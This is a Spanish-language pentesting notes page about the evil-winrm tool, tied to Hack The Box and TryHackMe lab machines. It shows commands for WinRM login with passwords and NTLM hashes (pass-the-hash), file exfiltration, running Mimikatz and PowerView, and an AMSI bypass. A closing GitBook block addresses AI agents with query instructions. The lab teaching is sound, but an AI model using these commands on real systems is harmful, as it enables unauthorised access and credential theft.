> For the complete documentation index, see [llms.txt](https://securitylayer.gitbook.io/securitylayer/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://securitylayer.gitbook.io/securitylayer/pentesting-tools/tools/evilwinrm.md).

# EvilWinRM

***Ver maquinas:*** [***Responder***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/responder.md) ***(HTB),*** [***Archetype***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/archetype.md) ***(HTB),*** [***Cicada***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/cicada.md) ***(HTB),*** [***Raz0rBlack***](/securitylayer/maquinas-y-modulos-de-thm/machines/raz0rblack.md) ***(THM),*** [***Driver***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/driver.md) ***(HTB),*** [***Timelapse***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/timelapse.md) ***(HTB),*** [***Support***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/support.md) ***(HTB),*** [***Heist***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/heist.md) ***(HTB),*** [***Baby***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/baby.md) ***(HTB),*** [***Fluffy***](/securitylayer/maquinas-y-modulos-de-htb/windows-easy/fluffy.md) ***(HTB)***

*¿Qué es `evil-winrm`?*

*`evil-winrm` es una herramienta escrita en Ruby que permite conectarse a una máquina Windows mediante el servicio WinRM (Windows Remote Management), el cual funciona sobre los puertos 5985 (HTTP) o 5986 (HTTPS).*

> ***WinRM** es el equivalente moderno de RDP o PowerShell Remoting, y está basado en el protocolo WS-Management.*

*¿Por qué es tan usada en seguridad ofensiva?*

*Porque te da una shell interactiva con PowerShell en sistemas Windows con acceso remoto habilitado. Esto es mucho más poderoso que una simple reverse shell. Es como tener un "PowerShell nativo" corriendo con privilegios del usuario que comprometiste.*

*Funciones críticas y potentes de `evil-winrm`:*

#### *1. **Acceso remoto con credenciales***

*Puedes conectarte con solo un usuario y contraseña:*

```bash
┌──(dante㉿hunter)-[/home/kali]
└─ evil-winrm -i 192.168.1.10 -u Administrator -p 'Password123!'
```

*O con un hash NTLM (pass-the-hash):*

```bash
┌──(dante㉿hunter)-[/home/kali]
└─ evil-winrm -i 192.168.1.10 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe'
```

*2. **Carga y descarga de archivos***

*Subís o bajás archivos fácilmente dentro de la sesión:*

```powershell
┌── powershell
└─ upload ./linpeas.ps1 C:\Users\victim\Desktop\
download C:\Users\victim\Desktop\secrets.txt ./secrets.txt
```

*3. **Ejecución de scripts en PowerShell***

*Ideal para ejecutar herramientas como:*

* *`PowerView.ps1` → Para enumeración de Active Directory.*
* *`SharpHound.ps1` → Para recolectar datos para BloodHound.*
* *`Invoke-Mimikatz.ps1` → Para volcado de credenciales.*

```powershell
┌── powershell
└─ *Evil-WinRM* PS > . .\PowerView.ps1
*Evil-WinRM* PS > Get-NetUser
```

*4. **Soporte para plugins***

*Puedes ampliar `evil-winrm` con plugins que permiten hacer cosas como:*

* *Enumeración del sistema.*
* *Ejecutar herramientas post-exploitation automáticamente.*
* *Volcar credenciales.*
* *Enumerar shares o servicios.*

*5. **Evasión y ejecución sigilosa***

*Al tener acceso a PowerShell directamente, podés ejecutar comandos más sigilosos y complejos, evitando soluciones antivirus simples si sabés cómo ofuscar scripts.*

*Casos de uso típicos en pentest:*

* *Post-exploitation tras obtener credenciales.*
* *Movimiento lateral en entornos Windows con WinRM habilitado.*
* *Recuperación de secretos desde archivos, SAM, o servicios en ejecución.*
* *Recolección de datos para escalamiento de privilegios.*

<pre class="language-vim" data-full-width="true"><code class="lang-vim">┌──(root㉿kali)-[/home/kali/Documents/HTB/SUPPORT]
└─# evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                              
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                         
                                        
<strong>*Evil-WinRM* PS C:\Users\support\Documents> menu
</strong>

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (`     '`    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers

[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
</code></pre>

#### ***Menú de Evil-WinRM explicado***

* *`Bypass-4MSI` → Ejecuta un **script de PowerShell que habilita la ejecución de scripts sin restricciones***
  * *Esto es útil si el sistema remoto tiene políticas que impiden ejecutar scripts (`ExecutionPolicy`)*
  * *Activa un bypass de políticas para que puedas ejecutar payloads, PowerView, Mimikatz en PS1, etc.*
* *`services` → Muestra información sobre los **servicios del sistema remoto***
  * *Puede listar servicios que están corriendo o no, lo que permite buscar vectores de escalada de privilegios (como servicios mal configurados que corren como SYSTEM y son modificables).*
* *`upload` → Permite **subir archivos** desde tu máquina local a la máquina remota*
  * *Ejemplo: `upload shell.ps1` sube ese archivo al directorio actual del host remoto*
* *`download` → Permite **descargar archivos** desde la máquina remota a tu máquina local*
  * *Ejemplo: `download secrets.txt` descarga el archivo del host remoto a tu Kali*
* *`menu` → Muestra nuevamente este mismo menú*
  * *Sirve para recordar los comandos rápidos disponibles*
* *`exit` → **Sale de la sesión Evil-WinRM** y vuelve a tu terminal local*
  * *Termina la conexión con el host remoto*


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://securitylayer.gitbook.io/securitylayer/pentesting-tools/tools/evilwinrm.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.